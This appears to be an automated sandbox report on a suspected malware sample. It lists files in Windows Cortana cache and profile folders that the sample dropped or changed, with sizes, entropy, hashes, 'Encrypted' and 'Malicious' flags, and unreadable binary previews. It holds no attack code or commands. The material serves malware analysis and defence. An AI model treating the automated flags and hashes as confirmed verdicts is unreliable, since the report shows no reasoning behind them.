                                                                                                                                                                                                    Preview: ...`.4<B.e..U 2..6....#\.;hl:.TG...H]...N.......v.=.}u..z+.T...1W.........C.}o.i....&.c5F..T.}......1...H);.|w........M.r.:..z.......s..>.....@.h.m...bx..".x.%...~.L'.@.....y'..c-r..D.$....!...m....A.Q_.'=.+...p..+/8..vvFd.q..#.,..0.B....4.....!8.%..gr..[..E...s.>...%H..i.e...}.'..N..x5....'................^........5.....k..Ed.wh.w..c.;.~K....k...!...<T.z[_...G(c.N..+r:j6.T.E-..z....>..K.....,..c.gr.9..%../.j.~....pN..x.i.5".{cQ?..r}..........-.A<j.@.........nlP..<\.A.S+"J.w'.U.F.WMy.Ly.H..<+.....2@.<.).....e9m.fpa..k.Xp.3hF...{.o..(.<..........*E..P...<t..z.$i..J..+M'..]?.*...>....4...v6.P....d...O.!.r...}!.f..).^Z4'..<ET.<&s..(...zC/#.K.*.8.I.[ a.]Q^16.,..T.c............}.#5.?..]c.?.S..J...a._..\Yhs...gb....4tI.y..br.#.%|.%.X.x.A.y...oD......A.."(9.r..~...Od...1{1.m>>...-.@..k.b...e2v.).h.<.".q...MM.....:.=........z.Y.x.z...U<bc........L....E..@.{.....V..DsI.)T.W..V..E..1.d.M\..6..@..#..z..5..U.>*....!.4.J5V..?..j.u..e..T..C..k.,_V
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\N5V1ZR9C\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_3[1].txt
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):50216
                                                                                                                                                                                                    Entropy (8bit):7.996458097897324
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:1536:DAGM4Ny4K8L4eB44TVfVQeXTkD4t73sHZbupo:8V484XcW44TVdQh4t73SYo
                                                                                                                                                                                                    MD5:63400C12E20E8296D09C31AB2A73396B
                                                                                                                                                                                                    SHA1:F351F88A147022672DAC961B819F0B2A18783031
                                                                                                                                                                                                    SHA-256:919645088E5630CE73A7DC18DB77769F70BD0D73EC6FA7D19CFE3FFADC369C98
                                                                                                                                                                                                    SHA-512:F80AF7DED7EE67C4D52FE63DC2E341AA798E47DFFF0D9777EE844E731AF7A16AA70055C3D71AD1AC073DFDD9CAD69D538BC1F0D5C7DED93F427DEE0D948ECD25
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: z....p|=s.O>0....f.n..f........QHol'\!....~...H......v....uc..../......CI........1_.f.j`.:o......D..7e......;$H4....v#?..5o1...~..a...r....M....PCL..c..A+....@[..!..b.xaW..VH..@...;.J$.c2.|.I+.....t.Qb..Q..z.O>....(`H.....N.....,.........a5.... ...$.D.?.@...........T ...e.r....\....^..R,YA.`uA..}XN].a......b.hG}..:.....).m.:.C...('V.[..&.......~.9.Q.........w....U.......k.R.............A^....l...C....@cA..R.M[.... 6....G{...x.}K...a.0.Y..nd.Wv..j.%.Z.1Q...q....5.]b.........(.v"]9....e....I.I....ptl.....v.....l..EIU..Y..GA.-..o?p..?.l..K<.%2.2..=......K.]P...^......^...?.z..~..qN....k6.`.2.N..`<.....d..Hf....2Rx8V'.&_/...dXd~#"k...1.Q.lP.S....'_.i+...4...Y.]<T....."x.&..2..@D%.J.I..8.....9,0#{..........PV.W........LH.....S.$...^*..4J_DD-.....2Q*${..).J.hU.$..w...2{V...6.J..r.....=.:....K.ish1..vOl.`|..(y.<../....2...g...x..W.@.%..~.f7U.xMP. .?... ........C.....f......,.3...76..J6!-..g.:o.n.Q....NE....=K.T...^...._1.}N.I..j.&.....A....i}K
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\N5V1ZR9C\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_4[1].txt
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):20294
                                                                                                                                                                                                    Entropy (8bit):7.989505843178695
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:EJVWbCIikILgVbkKyaB5AhqM4Pc4Y4DxuimKlkM01GsC9k/Yu5Pad4K9udiKs2:aUCIikOIbk2LAhScOQimKlktGsyJYo2
                                                                                                                                                                                                    MD5:1DCEBE7089C8DF444FAD83EFC044ECF0
                                                                                                                                                                                                    SHA1:66A5D5D10148EC33311E1DB355D95561DE86880D
                                                                                                                                                                                                    SHA-256:8C8C8F1864B76BAB4D2DE60F60CF4AE23B8E8DA55EEBA92607A8791EDA557597
                                                                                                                                                                                                    SHA-512:1BB6EDBEC2A0A18BBE5E4174A97CBEB44FF1B573BFB9F3624533A3820D28727BF39D90D3B216EDD3DEED0EE5C841E938EC15DB82972C0F6CE678E201464590DC
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .T..{....&..J^R.N....6.U_S....4.L...q.././t+.M@..1D.+........}c.3..9D.....b.Mf.u..Q........|z..}7+.;.....r.R..(...$I..`. .Dic.....uG.(.......$?4..)N....5"C..'<Tr.=......R.Z..\]..i.......\D.$..Z+..3.....\.........r.\ 2~..Io.:\..;.Z.\.|.v.IM.F.e..."..@,x.Gg5|....M..`...Q&.Q...}Kux+...6..*..~~.+P7....H..o.|.w..........A.uxB+.g.V.gw+y-.6.E.8.&..Ep....).T.w^.WL.Y.u.VS......U1s....3..`t..:......'..2%......9G.....:LB.2...cc.*Sp............~p>.H..k..S8..7....3N.4....n.X....d...P.d.,sO.Y3...<....u.....:..c...F..9_..c..oW."....+......a../A..=.5...:.^y.<..X...../...R.@.O....{..2.....0j.!.dC+..N.F.Z......6Hf.;$..;6~.....f,G^...x.|]Q..`..>a....S2Y. w..ed!...&.\.N...$..wk....Q..gI..x.8...d.HFb|.......$1.5K..9....4.3..E..4.9.......j..b.>../.~.V....`.......NVo,..D..%yl.s\U.........)..?'.#..8.......2.qi.z.9.Q.R..&..+...S...........{d.XPAK....V.j_.........."j6.....E....U. u9...7.......&..F..k.k....R....$.w...!..{4....<.z. GW.!Z...^\.*xn.nDj.|.(.[.v.'.}..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\N5V1ZR9C\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_5[1].txt
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1758
                                                                                                                                                                                                    Entropy (8bit):7.887997463534197
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:4fylEd5xrG8AWM39x/iaonJKWU+Qf6Kb88s/iq+6QXD:Eyy1du37qPJ0+6a8Yp+FT
                                                                                                                                                                                                    MD5:4E1AEAD503DD50FD0D45A05A8525FA08
                                                                                                                                                                                                    SHA1:4E59E91B4F5E5530D097B90456C4F72F1B110C20
                                                                                                                                                                                                    SHA-256:BCF495585C16579853B388AB5B50C9F6089CA816E2B3CA075C53929A06E50F8D
                                                                                                                                                                                                    SHA-512:FA86140331909BBA2AE321E4D4BC180390AEB14DB7AC1DDE1CFECD804319FAB109EDD4D0A5D5FCB244DFF3D5202EFADDC4CD3A2874002B15372F61F3B23880B8
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..C..Yp.......|.R,..._.g.[.....-..]...$UD............[&..D.K.......!qA..O.g.....M.....w..,...y..Q...S.y.}y..K`......I.Y..Z....?.g......#.w..)....%.Bl}|. 7...y.2.<)Ec....]B\.{..o.u".c{g.!...~....O.r...b..].K.7h......k.3....T.@.*.\.Sz.Q.jfj.N@..2..#a..S...jSK..<.VVIm=|..}.0.W....j@.@K......5..u....w..w..HTY..@e.LV...07..M.pQ#.B...r..#.`l...o.hX?...#...$.wWN..HP...K.u.......'R...Q...pE@..Zu..5:.I...B.gR..T..-.7.$.H<a..}.G).}.....k.M.L|..O..s..4.E..p|.1{-.x*P|..?._..X:..,....Gb.J^.^._.e5*Ctjt....d..Gu..-4.P.......%.....(..tl......[.p...... (.n!.........S.........8{.........F.......)....6...V.G.4..6..5JO....sw*...T.k.h.VC_.....j...>3.7J.xe..'.`.%m..e.J.4]d...p<.EP........C..3.L.....1.$^.K.&..aL...+.....r..5...._T..JG.;f..sN..#.....P.sb.p..#7...`..C..}e.R`.1...#...H..<.-.\...+....&.#....>....@;.'...xs{.AmC}T.n50...i18..R....45.b..^n.s.O....U....CH*...E.A..zQk..E..b....y..|.6.;..u].a.%xy...6.r..<#..r=...#$..`R...}V..Ry..........X..i...e.....H
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\N5V1ZR9C\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_6[1].txt
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):35241
                                                                                                                                                                                                    Entropy (8bit):7.993632735142601
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:768:REYg1LJEQSjHq6jedQnm9E0C61IlsfzqqQjpDRodP6:RwLaTjNnz0C6KlsfGNoE
                                                                                                                                                                                                    MD5:D2C045242505E4E5F39C29A0436D99D3
                                                                                                                                                                                                    SHA1:523C98E5FBBF54489221424493EB6F0A0D649B83
                                                                                                                                                                                                    SHA-256:17EB53F9E361F50DD4ADCA65BE5FBBECEAE5966FCD2A629AF2645D82DB8A2FCB
                                                                                                                                                                                                    SHA-512:F51C8F5EB1E6878CC7625D00E7E8D9FFDC5A6A72B2C4F03D66CC9D3CBD7D637D33D5E87377ABDE65FD22F993DBB1FFD5E157EB9D4768CC682100EAFAC586B418
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .|........<C @...h..^.I(.o.Sm.........].M...U..P$t.H&...)..7pA..%.?I..'...A..:..)....~..bF.!..V.8{.&....E...;a.Xg......7...8m..!...hW...5.Y....2._...@..R.........C..'D.......F..!.....qa.H.^d.{...-.7....`X..8.v.o..a.sa..2.H."...e...hY78.....}p...Z....A~.T..4#N*.W..A....To.6..).0.V.]..h:I]...i..E..]O....dZ-[.r........-9...].MI...t5.....Z.PV!24.S.........V@..xI..._..q..W...b.Cx....$.C......4..y.......j..4n.w....._b...${.N..2.Rw.)\.{..l ..s......?<eaq.9.B.....W..i....l.*.q..9!...I.\..._.;.o9>...!6....s...l..........c.....>;....i.............[.sf?...tm...#Ue...Y..&.h.?.j:.g.v....m..J.......<....b[....q....C.!.....%g.<.9.gr..H......$}.U.$.-...9.....%.E(x...Vq....?.W.... ...y.....I.RFc.B.m&..r=..z>.....Q...rl%4s..T...)?...8....;..AH'......a,...h...S.kf.%+.OhL.;Q.E..`.d.c..H ....9.....1>+..@....L0W..R..tg._.R..Ma.....w..Jml..b.wA$>....;2~...@Wr.....*..46.e..?.k....sk..h.M....."......(].....7y....b.3.^lb..x......@...5....*.m]Ql.I..z..`_.~.<
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\N5V1ZR9C\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_7[1].txt
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):18974
                                                                                                                                                                                                    Entropy (8bit):7.992041952044642
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:384:7BiHEahnuWTDNf3/dBWTFuaJBWvSMh7qdKA/WQqNhucUw49/Q:liHjlTD1vDOFuaeqd5WQqNhyPi
                                                                                                                                                                                                    MD5:0C01B88CEDD322F663CC5EAB8E4BD9C1
                                                                                                                                                                                                    SHA1:D77D5259CB00A89AD9F205153218029B7D4F3887
                                                                                                                                                                                                    SHA-256:7CDDA5167E27A553A62AAAE89DA4A5F9B5A82C9723501EC9EA2A88735F6B92E8
                                                                                                                                                                                                    SHA-512:F4A7AAB0106677C4CEC6BF097344023EDB7F48F17F7A080CC2036C9583A7C88BBAD147D77C0AA1503E989A0D5128284528FA0411E7891A6C6CCF9606104DD288
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...3...;.rl...`...o.Lb.....k...+n.....g........6U9.S...0..)..2.f....I\g.L.^..rw-.qT.)>.....\..}..}a..Y..NV..V...d.....z....*D......D.{5....-.q.....Q..x...%2#........]......HP..\.<(......F../x.Z..6.aTv~......_.p....F|..ZJ.!.ex.N&t..5.j......"...[..~c.......e..'.... ) ...r.......Jz...#.o.^....;..OF..e.|..cLg.FP...4g..x.\..y..x.>..+.C..l3.P.).......9..p9e~.i9.k.......gA..}T....{..&.......e...yN.............$..'.Z|..wq.Ci.,Oxks.`....s...s^.....F..h........a.........s.{..........3zn....3[H....>......b.R..b.@&.7..!..#}.3.;5s..y.....H&U..}.w."|.....).../...-`.*U..y^.5..`.x....?=\..-\...Z2..Z:.p..ZK.,g..a.0.....s..ig....[....k.t?..Y.k.A%IP..8.H/n....W8..L....{~.D<.......^|Y...6_.y..h4..".....bH.U...........>....t...1\..o.vF.H.....e..G...U.2....d}b......*.K..eI.`.J.R0..f9uT.b..V...~.../4F..1..../..1.p..F.=..c...n&....W...u.%.LD.`................m}i...Gh[.Po>....?R..5..,..Q.t":..+....U.....hW.8.e.k.A.....6.J.w..........."..... ..5...
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\N5V1ZR9C\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_8[1].txt
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):17777
                                                                                                                                                                                                    Entropy (8bit):7.989885349773623
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:EPhKF4MBTCBvGvHo8Beh/ZXO132p3zjuKODGWuT0TToPkg:EPcF4MoBvGArhe18fuKOD5uBPkg
                                                                                                                                                                                                    MD5:CC3DAC2F37BEB5F3EA1BDD2430153501
                                                                                                                                                                                                    SHA1:AA54940410F4F334F08ECF1632D15DBBF29DE82E
                                                                                                                                                                                                    SHA-256:9FC2743344C34F12CD1F192A03E2B8CE255E80A37013A75E1AC5854471CD0EEC
                                                                                                                                                                                                    SHA-512:D2AC3BB03FB2F088563B62F57727EA930F56D05CEAD9A97DE9584D1EBB955A2BA3D41A44E6F2F740C703EE032C9CFB6AB28486286DD8D055AAB4989D03A67DC2
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: B.q......L....dFB.y...e>'..s/$.t....:.b.z.j......f...XhQ..h.OBL..S..~^...[.C..dN..<|L.P...Jk.0."T...BG:G].?...k.pM.B.....n...<.^.0@M..},;..=..O(~.dl..MJ..}-..S{....a.q.N.x.........^....R.bd...i.q.i.[.p>.r.v.`.1Z(...9{...X...;;^ ..._.{..o.......1.vp.....I..L.]<.../....ekJlO{:..........}.{h~...((6n!..vB..".~.%.jG.w#..4....../...J...Q...X..W...Tn....!.t....X..Z.R.6.(..!..z.SZw`.........K6..m.K5t.g-.......6tD....2..YrT\.....Q..f\.-.. S.R(\4.{oQdA...c..XH%.....XwP...a..r"...zYv, .v}.)...u.1K0..5h.....{.3B.}.@....K5|...v............,S.'..?pZ..;,....u.6......GB..eg.\.F>..C.....O_.....Z.j.'0..x.H..@z..&..$..1m....}..]....E.!.O....{vE..26..i%......z.7.O..9..{.Se...<.S.5.....G.,.s."....C.q._...W..<..w..~NvP...W..B..!......I....%.....Qh.7D..g".R.4..}...}k.....dr.d..l(;....g.OL@$...\..{l...?yCWn9Cxc...RcO..."B.i..2_l..CZq...<%.(.k.....).S[.;|[.ccg..!~.x=='~...v>....a..@\e.1uR..BY..Y3Q...Yv...;.m;.....@7.,.A.^.......`...Y6....eQ5....$1...b.....n......+..l..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\N5V1ZR9C\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_9[1].txt
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):6394
                                                                                                                                                                                                    Entropy (8bit):7.972971771578217
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:NEkAHaeqpJnRITK7xmlnbTsDDf87P9aZK6eta:NXAHa5pwTteb87P9a+a
                                                                                                                                                                                                    MD5:2A25B63EA827DB0C9D5497CB31D5E533
                                                                                                                                                                                                    SHA1:327FA431F180E68144BDB8B54256F9A4B1BF05EB
                                                                                                                                                                                                    SHA-256:DE09622519E36296499EB5C82F9D8C8DBA0D7750981D4BD1EAC1F9D4953E8981
                                                                                                                                                                                                    SHA-512:621455045F6AF8187DDF22DBA32864F280099F570927F940BBDA2FB4A6EDB5E833B8D89E1D6D6BACD338FABB03C5A173338A866EF8FE8697244FA52281EBD42A
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .&.q.T......p.e.....W..!.$H.;...."..U...@...n&.9.QEO........@rVs.......N+...he...........0}m.q.G..4.F;EA..lF..C....1#......X.......p.G.......g.B.@...H........s.e...@;.b.t.h9$.6......x....6.Y.A......r.k.f.... (.....d.-..m.$.,~p<X.P...a....._....F.@D...K.W.....T^7=...$..3,.Vm.w.V.$b....TvvY>x}.."......b..........:/.n...2..=.X.>....8......b....m.|m4.@{g6...........Dz>.uN.a..Q.\.>..........b..!?..c..K........t.)P<..-0F^...Z....%i...8......1.a..?r.KiV$`C.Hh....rg.Y!..M.(..a~.[o.....sK....a......N.PXs..'.%...[.......h.f'R......qb.n..k...(...-.....'HO(.9`...@k.f.k...M_.....~E...OV ..b.&..m.).H.h.}..).3.Xg..{4.....G..\...%j...Q`h.C$Y:j........u....d........[D.1`..~.D.?G.H...T..b...v..y.U....fI.....9.E.H.${...B................y.$%...9...........B.......a]..N...|<B8}"......}QU;.Uyx...2......o"i.nZa.~......7. [.".u.=4...DC...x.W6*m.>..r..|.d..$9c......1..P'.[.....s.VE.}...S|.0Z..,..nH.K......k.A11.Jy.X..;'2.8...<..3..d.......
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\N5V1ZR9C\1\appcache[1].man
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):6948
                                                                                                                                                                                                    Entropy (8bit):7.9727027616670885
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:JJr8rcP/Nm0SownCSUCcUjmensvLkQ42qRi:JRAcP89cCJnsB
                                                                                                                                                                                                    MD5:767F36A7E7F20D8F3370263BC8C2AD36
                                                                                                                                                                                                    SHA1:83072B5F82388C7BC545DFD62B0C0EC155B8C226
                                                                                                                                                                                                    SHA-256:2D8575D539367E5BA720BB5BC0DA8B10A0FC5E89EAE4B6E7C4370B7CEEBC29A8
                                                                                                                                                                                                    SHA-512:C1AA184018122EA9191D7A9BE9A0CA95A732C1DB97DF928418725399DA43D408DA43A928142FA865436152CE7AC2C10F9431EB6839688EC23E2BC7F61CB5A6C6
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ....T..w..6..D.CE.-..V...QU.a../.!..~..W.\.<.m(l.z."..v...m..Y.H..."._.c|.......tDi^R.......!..>".~.jg.c.p...y..p_..h..Zu..N...Tu.6.g...}#. s.M.`O...}n.M./`.....&.)wC.%.t.l.L6...X....K..Eh.........>.......f....... .T......jl(0z..`wwC.......w.z.NYN*z...0.....xA..YN.....z..-.c].|.Ck.(..#..d..Gy.........Y4.0..V..'.c..Z...u...I..N.Pa[/<*)....:}.W...A14.m..a#@.....d.>..O.`.<....a3.7.v.....=....{.e..w.#.47..aTi...~.h...A':C.B..0...-m.y.. 6_.VT+....,?u0..D.]A}.+R:<.....#Y....*y.Q.....%.jWE.I....#.....r.#..p.].o....E..(1x"jbM%....hm?).U#...~.........V...3..j...........p....{.. ..c..X.g$Rz.].J....#......2..a....g..b...F.Z...|o.....v.iT1Y...._2R.zD.&..)...2.*.c..t.k)....0..>..EkR...F?..a.. ..'..M.)...L@....@...:..I.(.'e..Z...:M..).......Q....Y...8a.V=.......'JE..9+0V..A...Lf.+.H89..|..F..-A.Fh..|.*?.$...r."k~.k 0V1P.@.....+Qn\.X.*...Et.ck..'.$.,.y.."A..c..s..(.I.\.P...../.i.&.^4.....&.I^|2.F...D...|{...J..y..Zq.Y....B.>.c.....8.RV..X.....#f..0P.. y.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\MSIMGSIZ.DAT
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):49449
                                                                                                                                                                                                    Entropy (8bit):7.996798225748611
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:1536:x5WH0gO3OLghKlZXpuFV/wzf2LN2+JSZ4NB:iH0goOshKLc3wObSeH
                                                                                                                                                                                                    MD5:C1BD5C3C5A112F9C3E78B46C7C8D6398
                                                                                                                                                                                                    SHA1:F6CF86B874278F71F039132A7D28E60D389C0E75
                                                                                                                                                                                                    SHA-256:EB9F198497202DEDE1D450BECE166387D87E16F486AA97C4FEAE4D56E9E2EF70
                                                                                                                                                                                                    SHA-512:5CE7E1127634A68D215654F6BBDCD1A3E1E5202457D332B85EDF54254A1F3A816A02B50B0BC383E7AC0B0B90FDEC7EEE5EDF1EFEE6DB681031A30AE23C2A8FFC
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...5.p..L.H.8..|..=..+..&..QM..B..X...PSyh.o6..1.c.$...J..n.9.. .y....Co<.....=..-.(X)d.bK.[..N.4l.E..B.NQdy..W...C[.......x.-.*rCL......./....-^'!/..DeT.U...|=%.e..tiI2.....[%u,........K......U..V.P.....^......R.P...-tn.B........QYZ..m.Vw...|]b.....L..g.C.N.{1:.v1^..g-..35 .(..>..1D0....]..8..Y.gW.%I+........1P..%pF1e.+G....... .J....fkp...4.6.>3....$.=./.....s.N.tu%D..D..".....Hk.b.,B}$.(\N.@.....:.+....)2...q..c$.g6.....CH....0.........S...t.....Gz....Q.i.%LK...~...@..1.'.)Y...um9.$9....."..8..oS.{.qY)&.K.....*..Q2.|v{......"..q..S..[1..A|.Sl..-...7...%..J<.'....3.g.t........+....`.-......L.Q......T...O...$;.>..k.[X.m.../.........).xYUF..8n.Z].\.I.OM.in... .........#.......Vx..w..J..F^.s..A.......a..*D.;g3......n......w.J\7nX..9....../c...._,...C\..jR.....X.>..!.R.,c.W.}.F.!/;...Z.5....zx...F.n.<..S.. R.;,.....'A.?.]./8z.1.t{..S:Wu.:...K.(..+[.1..<..h..Y..M..' ......S...n.W@6..sJ..k..}#.y$kc_.K]>.l6.g..t.H..}.WQD.H..7....;.n.T..&V.W......
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\IS7SFJTT\www.bing[1].xml
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):152648
                                                                                                                                                                                                    Entropy (8bit):7.998775518617135
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:te3UlSarkGztw+VPZv1epWKNEnGvy9m9ArLkN7HXqE+f3V0dwyit4NynjGd:toUlJrxw+Ni2Gvim9ukNrH+f3uonqd
                                                                                                                                                                                                    MD5:7C5438D80458414FE64B64A809F34E76
                                                                                                                                                                                                    SHA1:2098756852577E6CAEB95EAF8188B2C5D5CEC7BA
                                                                                                                                                                                                    SHA-256:739B380AD74E66CC3D791C309F8E4949EA14CD014C57336384B05D89C6807F95
                                                                                                                                                                                                    SHA-512:DF46367C8DD1DCD1B42B360617E22259F137DE877B4B87F3724AC2CE4AF310FDB88732A55E6AF65FAB767A9C50203E21C612AEA51A66510AB80E5852566D9F52
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..q.....>...|.!..$oDQ7j.5..M~..{.#g1.:....1oz....-.VI...Y.............T.....?"f.A.!...6..=.......o..4n.w...0a!.dH.Wyj.n.^...~5|..(..2..M;..u:...8T)...C?..}F...~t.7.'.I...V...^gWk..v.p..<,LL.bPv3.[...d."ms]..W...>.k&uI...........&......+.B.M!.0.2U..>.]w>:.3...&..0_.......n.A?fX.+.#...i...+.(..(...2..,.0...G...T......Ypp.ts.*v.j.M......[....k...q.QdiN..{......L..Q.!.};.....v.Z.r:'0.'..6s.W..(8.=.Fv.Y...+.F)V.g!g,........KiM.....qg1........T!K.W...d...,.K.4\>...Cy...9.t.MU..v.U...@Q?..3nbJ..........~]...|%m.Rj...c..Y:Ui.N..........o.mS.$.v.h....<......2...S. 3[...J...1......,....f....[......X..GUQ|s..Ei_.....,..2~.|D....2.wK..>_J]Y.dd...T4;....NrM.........D.(.@.(J.w+1;..C........ut.!?..).q.U.RQ....5E.9....G7IJ.-............%7<9...6.^>)..d.../3.~...+.[&.w.X..`(..r3%.].;....L....%..}.........|B...P9.....BH.".H.\..2..i4...b.".L...*q.-..../.Z..9Z.]m..1...|....sQ.*....U.....t.`..3...h+..j..B..2..=H.s...........@u..T...U..2...W....3......g%"..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\Indexed DB\IndexedDB.edb
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998850125547513
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:InKeP561HbrL1e5pHaoIWOJreHfiJe1gfQFrH+4Dj+SZ6MWbWr:p1IkoqJeVFqE6MW2
                                                                                                                                                                                                    MD5:F896BB162DAEFE6736B14131A3F39657
                                                                                                                                                                                                    SHA1:CEC60D5235ED329926A39B4AFD8895DBF6B08557
                                                                                                                                                                                                    SHA-256:814618DFF819EF8AE4E794CD3E229915359FFDCBC8581D1C83DB770C8B4B2A08
                                                                                                                                                                                                    SHA-512:93B3AD445E18BEF3B3A23E6F0DE35286EDACC13FEAF4D558A2E046B77823DD882D6831496FE71301202651B14C3ADBA61C364D0B0B69408ADFC89AB9F9A8C552
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: P$f.BHw}...M.A...p.|.d.......&2...h.:.HS<.....Z..HHB..$ehB...+...^...:.O_lK.L..=.........P_O.-f7v...DUDo...........iEu.w..4GsQ..:.g..|.I.7..../......<.._..F..(.D..H..z....i.E.[c...M...}.+._Qy......V{~/.>0P..=.O.Kd.'o..C.:.._,!t...X...<..&09~......#...x.*k..X.H....],V..w....vX(.Z3s...v.8...>Q......w..M....,2p...0....+......v.......{*...?....,.u..........."C&..:.).a9?..~.k../,...h../).&=.S2...G.`c.U..8..S..I..g.g..;y...".I_3@.Im..Q...u...|.w.J.... 9R..{ek.....Y..O.:5..c.uR$.}K..M...:'..uY..X.>D5JR.`.[..R......4.d.!..'.=...P....E....S...+.(.'....$.}.oO..jQ.qB..Q..2..v..K1..g..5.[z`.F.pw$..!.k.........4..F.y...e..5..j...|.i&..m-.f.....:..x.>.8......q....p..........Vb..0......F......._..qH.....a....V...j.]...DX-"}.{s..@'A.....w...J;TV."@...\...-.G.@...../.|.b3X...p.R....sr.p.h.X..;......LbP+..RN.a.&.16.y.[.G.=..9.,..d......<.>....p....../0.A3...HF..."M..B.e.oMH.}...m....c.<..?....Y......z.\.AWq..!.1...e.G...R... &bc1....O......p.).v.I..9....
